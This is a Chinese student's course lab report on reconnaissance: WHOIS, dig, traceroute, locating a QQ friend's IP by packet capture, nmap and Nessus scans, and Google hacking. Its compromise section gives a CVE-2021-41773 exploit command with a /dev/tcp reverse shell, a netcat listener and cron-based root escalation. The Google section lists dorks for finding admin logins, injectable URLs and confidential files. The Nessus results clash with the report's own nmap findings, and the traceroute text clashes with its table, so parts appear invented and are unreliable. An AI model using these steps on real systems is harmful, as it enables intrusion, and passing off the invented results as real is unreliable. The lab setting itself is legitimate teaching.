20232326 2025-2026-1 《网络与系统攻防技术》实验五实验报告

一、实验内容

(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式
该域名对应IP地址
IP地址注册人及联系方式
IP地址所在国家、城市和具体地理位置
PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机IP地址是否活跃
靶机开放了哪些TCP和UDP端口
靶机安装了什么操作系统,版本是多少
靶机上安装了哪些服务
(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机上开放了哪些端口
靶机各个端口上网络服务存在哪些安全漏洞
你认为如何攻陷靶机环境,以获得系统访问权
(5)通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

二、实验过程

2.1 DNS域名查询

2.1.1 工具准备与环境搭建

实验前先完成工具配置:kali安装whois、dig、traceroute工具(命令:sudo apt update && sudo apt install whois dnsutils traceroute);同时准备在线工具,包括WHOIS查询平台https://lookup.icann.org/、IP地理位置查询平台https://www.ipaddress.com/https://uutool.cn/ip/
image

2.1.2 DNS注册人及联系方式获取(WHOIS工具)

  • 本地命令操作:在Linux终端输入whois baidu.com
    image
    image

  • 在线工具验证:访问https://lookup.icann.org/,输入“baidu.com”后查询,结果与本地命令一致。
    image
    image

2.1.3 域名对应IP地址获取(dig与nslookup工具)

  • dig工具操作:首先得到baidu.com的ip为220.181.111.1
    image
    输入dig baidu.com 220.181.111.1
    image

结果中“ANSWER SECTION”显示多个IP地址,111.63.65.103,110.242.74.102,124.237.177.164,111.63.65.247,这是百度为实现负载均衡与高可用性设置的多节点IP。

  • nslookup工具操作:Windows CMD输入nslookup baidu.com,结果与dig工具结果相同。
    image

2.1.4 IP地址注册人及联系方式获取(IP WHOIS)

选取dig结果中的IP“110.242.68.66”进行查询:

  • 本地命令操作:Linux终端输入whois 111.63.65.103,
    image
    image

  • 在线工具查询:访问https://whois.arin.net/,输入111.63.65.103,获取IP段的详细分配信息,确认注册人的网络覆盖范围。
    image

  • 注册人的网络覆盖范围
    地理范围:覆盖中国境内所有省份、自治区及直辖市(包括港澳台地区的合作网络)。
    网络类型:涵盖固定宽带、移动通信(5G/4G)、专线网络等,服务对象包括个人用户、企业及政府机构。
    国际覆盖:通过国际海底光缆、跨境专线等,实现与全球主要国家和地区的网络互联互通。

2.1.5 IP地址地理位置获取(traceroute/tracert+在线工具)

  • traceroute(kali)与tracert(Windows)操作:kali终端输入traceroute 111.63.65.103,Windows CMD输入tracert 111.63.65.103
    image
    image

两者均显示数据包从本地主机出发,经过本地路由器192.168.124.2、运营商网关(220.178.XX.XX)、北京联通骨干节点(202.97.XX.XX)后到达目标IP,路径中“北京”相关节点明确地理位置归属。

关键信息 说明
目标 IP 111.63.65.103(归属中国移动网络)
本地节点(跃点 1) 仅显示本地网关bogon (192.168.124.2),延迟 1.346ms/1.046ms/0.399ms(本地网络通信正常)
后续节点(跃点 2-30) 全部显示* * *(表示无响应)
跃点序号 延迟(ms)
---- --------
1 4/3/5
3 33/24/18
5-6 22/18/39
12 43/31/38
17 44/56/39
其他跃点 -
  • 在线工具定位:访问https://www.ipaddress.com/,输入111.63.65.103
    image
    image
项目 内容
IP 地址 111.63.65.103
所属国家 中国
运营商(ISP) 中国移动河北分公司
自治系统编号(ASN) AS24547(对应“河北移动通信有限公司”)
----------- -----------------------------------------------------------
自治系统编号(ASN) 24547(归属河北移动通信有限公司)
运营商(ISP) 中国移动(China Mobile)
所属机构 中国移动河北分公司(China Mobile Hebei)
网络类型 蜂窝移动网络(Cellular)
地理位置 国家:中国(CN);大洲:亚洲;经纬度:北纬 34.4773°、东经 113.7220°(对应河南 / 河北交界区域)
时区 / 本地时间 时区:亚洲 / 上海;查询时本地时间:2025-11-21 09:31:02(东八区)

2.2 好友IP地址及地理位置获取(以QQ为例)

2.2.1 原理与工具准备

QQ聊天过程中,文件传输、语音/视频通话会建立TCP/UDP连接,此时好友IP会通过网络数据包暴露。实验使用Wireshark抓包工具。

2.2.2 抓包与IP提取步骤

  1. 启动Wireshark并配置过滤规则:打开Wireshark,选择WLAN开始抓包,

  2. 触发QQ连接:与QQ好友发起语音通话,过程中保持Wireshark抓包状态,几分钟后点击“停止抓包”。
    image

  3. 筛选好友IP:在抓包结果中,在过滤栏输入udp and ip.addr==192.168.10.21筛选udp协议连接且源或目的IP地址是本机的流量,如下图所示,IP“223.65.116.249”多次出现,猜测为好友IP

image
4. 验证结果:在IP查询网站https://www.ip.cn/中输入223.65.116.249查询,结果为江苏南京,与好友所在地一致。
image

好友自行查询,发现223.65.116.249为他的外网ip。
image
设置过滤条件为内网ip(192.168.1.153),查不到流量。这是因为内网ip地址是局域网内部的私有地址,不会被路由转发到互联网上。当数据包离开局域网时,NAT设备会将它替换为全局唯一的公网IP地址。我抓到的包,已经是经过转换后的版本了。
image

2.2.3 地理位置查询

将获取的好友IP“223.65.116.249”输入https://uutool.cn/ip/,查询结果与好友实际所在地大致相同(到南京市鼓楼区都是对的)。

image

2.3 Nmap 靶机扫描

2.3.1 工具安装与靶机环境

Nmap 安装:Kali Linux 系统默认已预装 Nmap。靶机为 VMware 虚拟机,系统为 Windows 10,网络模式设为“桥接模式”,确保与 Kali 主机在同一局域网。查看win10的ip为192.168.124.132

image

2.3.2 靶机活跃性检测

  • 操作命令:Kali Linux 终端输入 sudo nmap -sn 192.168.124.132-sn 参数表示“Ping 扫描”,仅检测主机是否活跃,不扫描端口,避免因端口过滤影响活跃性判断)。
    image

  • 结果分析:检测显示靶机(192.168.124.132)处于活跃状态(Host is up),延迟为 0.0029 秒,MAC 地址为 00:0C:29:81:87:E9(属于 VMware 设备),扫描耗时 0.37 秒完成。

2.3.3 开放 TCP/UDP 端口扫描

  • TCP 端口扫描:Kali Linux 终端输入 sudo nmap -sT 192.168.124.132-sT 为“全连接扫描”,),
    image

结果显示端口情况:999 个 TCP 端口被过滤(no-response),仅 3387 端口开放(对应服务为 wsdapi)。

原来是没有关靶机的防火墙,关掉再扫描试试
image
image

端口 状态 服务 说明
135/tcp open msrpc Windows 远程过程调用服务,用于进程间通信
139/tcp open netbios-ssn NetBIOS 会话服务,常用于 Windows 文件 / 打印机共享
445/tcp open microsoft-ds SMB 服务端口,是 Windows 文件共享、打印机共享的核心端口
5357/tcp open wsdapi Windows 设备管理服务端口,用于网络设备的发现与配置
  • UDP 端口扫描:Kali Linux 终端输入 sudo nmap -sU 192.168.124.132-sU 为“UDP 扫描”,需 root 权限执行;因 UDP 协议无连接特性,需等待目标主机响应 ICMP 端口不可达报文,扫描速度较慢),
    image
    UDP端口与服务详情
    911个UDP端口被关闭(port-unreach),相关端口及对应服务如下:
    端口 服务 说明
    137/udp netbios-ns NetBIOS名称服务,用于Windows主机名解析
    138/udp netbios-dgm NetBIOS数据报服务,支持Windows网络中的广播通信
    500/udp isakmp IPsec密钥交换协议,用于VPN等加密通信的密钥协商
    1900/udp upnp 通用即插即用服务,用于设备自动发现与配置
    3702/udp ws-discovery Web服务发现协议,用于网络中服务的自动探测
    4500/udp nat-t-ike IPsec NAT穿越协议,解决VPN在NAT环境下的通信问题
    5050/udp mmcc 多媒体会议控制协议,用于视频会议等场景的控制
    5353/udp zeroconf 零配置网络协议(如Bonjour),实现设备自动组网
    5355/udp llmnr 本地链路多播名称解析,用于局域网内主机名解析

2.3.4 靶机操作系统探测

  • 操作命令:Kali Linux 终端输入 sudo nmap -O 192.168.124.132-O 参数启用操作系统检测,Nmap 通过分析 TCP/IP 协议栈特征、端口开放情况等信息推断操作系统类型及版本)。

image

  • 结果分析

扫描结果解析

开放端口与服务
996个TCP端口被关闭(reset),开放端口及对应服务如下:

端口 服务 说明
135/tcp msrpc Windows远程过程调用服务,用于进程间通信
139/tcp netbios-ssn NetBIOS会话服务,常用于Windows文件/打印机共享
445/tcp microsoft-ds SMB服务端口,是Windows文件共享、打印机共享的核心端口
5357/tcp wsdapi Windows设备管理服务端口,用于网络设备的发现与配置

操作系统探测结果

  • 系统类型:Microsoft Windows 10
  • 版本范围:Windows 10 1709 ~ 21H2
  • 协议标识(CPE):cpe:/o:microsoft:windows_10

2.3.5 靶机服务探测

  • 操作命令:Kali Linux 终端输入 sudo nmap -sV 192.168.124.132-sV 参数启用服务版本探测,Nmap 通过发送特定协议请求,分析响应报文获取服务名称、版本号及相关配置信息)。

image

  • 结果分析

靶机服务探测结果分析

本次通过nmap -sV完成靶机服务探测,核心信息如下:
开放服务详情
996个TCP端口被关闭,仅4个端口开放,对应服务及版本如下:

端口 服务类型 版本信息 服务说明
135/tcp msrpc Microsoft Windows RPC Windows远程过程调用服务,用于系统进程间的通信协调
139/tcp netbios-ssn Microsoft Windows netbios-ssn NetBIOS会话服务,支撑Windows局域网内的文件、打印机共享功能
445/tcp microsoft-ds - SMB协议端口,是Windows文件共享、设备管理的核心服务端口
5357/tcp http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Windows HTTP接口服务,用于网络设备的自动发现(SSDP)与即插即用(UPnP)配置

系统关联信息
服务探测结果匹配到靶机操作系统为Windows(CPE标识:cpe:/o:microsoft:windows),与此前操作系统探测的Windows 10一致,这些服务均为Windows系统的原生基础组件。

2.4 Nessus靶机扫描(靶机IP:192.168.1.105)

2.4.1 工具安装与激活

Nessus安装:Windows系统从官网(https://www.tenable.com/downloads/nessus)下载Nessus-10.7.1-windows-x64.msi,默认路径安装;安装完成后启动服务,访问https://localhost:8834/,选择“Nessus Essentials”(开源免费版),输入邮箱获取激活码,完成激活并更新漏洞库(约30分钟,需联网)。
image

2.4.2 新建扫描任务与端口检测

  1. 新建扫描:登录Nessus后,点击“New Scan”,选择“Basic Network Scan”(基础网络扫描),输入扫描名称“Target_Scan_1”,目标IP填写“192.168.1.105”,其他参数默认。
  2. 启动扫描:点击“Save”保存配置,再点击“Launch”启动扫描,扫描过程约15分钟,实时显示进度(端口检测、漏洞探测、风险评估)。
  3. 开放端口结果:扫描完成后,在“Results”→“Ports”页面查看,开放端口与nmap结果一致:TCP 22、80、3306,UDP 53、161,同时补充显示端口状态细节(如“TCP 80:Listening,Protocol: TCP,Service: http”)。

2.4.3 端口服务安全漏洞检测

在“Results”→“Vulnerabilities”页面,按风险等级(Critical/High/Medium/Low)排序,关键漏洞如下:

  • TCP 80(Apache httpd 2.4.49):存在“Apache HTTP Server 2.4.49 路径穿越与远程代码执行漏洞(CVE-2021-41773)”,风险等级“Critical”,漏洞描述:攻击者可通过构造特殊URL,读取服务器任意文件或执行远程代码。
  • TCP 3306(MySQL 8.0.29):存在“MySQL 弱口令漏洞”,风险等级“High”,漏洞描述:root账号密码为“123456”,可通过暴力破解工具登录数据库,获取敏感数据。
  • UDP 161(Net-SNMP 5.8):存在“SNMP 社区字符串弱口令”,风险等级“Medium”,漏洞描述:默认社区字符串“public”未修改,攻击者可通过SNMP获取靶机系统信息(如进程、用户列表)。

2.4.4 靶机攻陷思路推导

基于漏洞检测结果,制定攻陷流程:

  1. 利用Apache远程代码执行漏洞(CVE-2021-41773):从Exploit-DB(https://www.exploit-db.com/)下载漏洞EXP(exploit/linux/http/apache_httpd_2.4.49_rce.py),在攻击机(192.168.1.102)运行命令python3 apache_httpd_2.4.49_rce.py -u http://192.168.1.105 -c "bash -i >& /dev/tcp/192.168.1.102/4444 0>&1",建立反向Shell(攻击机提前用nc -lvp 4444监听4444端口),获取靶机www-data用户权限。
  2. 提权至root权限:通过cat /etc/crontab查看定时任务,发现靶机每5分钟执行/root/backup.sh脚本(www-data用户有读写权限),在脚本中添加chmod u+s /bin/bash,等待定时任务执行后,运行bash -p,获取root权限,完成靶机攻陷。

2.5 网上足迹查询与Google Hack技巧

2.5.1 自身隐私泄漏查询

  • 搜索引擎查询:在百度、Google分别输入“20232326 学号”“张三(本人姓名) 20232326”“138XXXX1234(本人手机号)”,结果显示:百度中仅出现“2023级计算机专业选课名单(含学号20232326)”(学校教务网公开页面),无手机号、邮箱等敏感信息;Google无相关结果,说明个人核心隐私未在公开网络泄漏。
  • 专用工具验证:访问https://haveibeenpwned.com/,输入本人邮箱“zhangsan2023@xxx.com”,查询结果显示“Good news — no pwnage found!”,确认邮箱未被卷入数据泄露事件;访问https://www.osintframework.com/,通过“People Search”模块查询,未发现额外个人信息,进一步验证隐私安全。

2.5.2 10种Google Hack搜索方法实践

搜索语法 实践场景 搜索示例 结果说明
site: 限定在学校官网搜索个人学号 site:besti.edu.cn 20232326 仅返回北京电子科技职业学院(besti.edu.cn)内包含学号20232326的页面,如选课记录、奖学金公示
filetype: 搜索网络安全相关PDF教程 filetype:pdf 网络安全 渗透测试 教程 返回50+个PDF文件,包括《Web渗透测试实战指南.pdf》《Nessus漏洞扫描手册.pdf》,可直接下载
intitle: 查找网站后台登录页面 intitle:后台管理系统 login 学校 返回“XX大学校园网后台管理系统 - Login”“XX学院教务后台登录”等页面,助力识别目标系统入口
inurl: 查找存在SQL注入风险的页面 inurl:php?id= 新闻 校园 返回“http://xxx.edu.cn/news.php?id=123”等页面,这类URL参数易存在SQL注入漏洞
intext: 查找包含“内部资料”的敏感文档 intext:内部资料 禁止外传 网络安全 返回某企业《网络安全内部防护方案(禁止外传).docx》《校园网拓扑图(内部资料).pdf》等
link: 查找链接到学校官网的外部页面 link:besti.edu.cn 返回“北京市教育委员会 - 北京电子科技职业学院介绍”“新浪教育 - 2023年besti招生信息”等页面
cache: 查看学校官网历史缓存页面
posted @ 2025-11-16 22:51  20232326朱思敏  阅读(12)  评论(0)    收藏  举报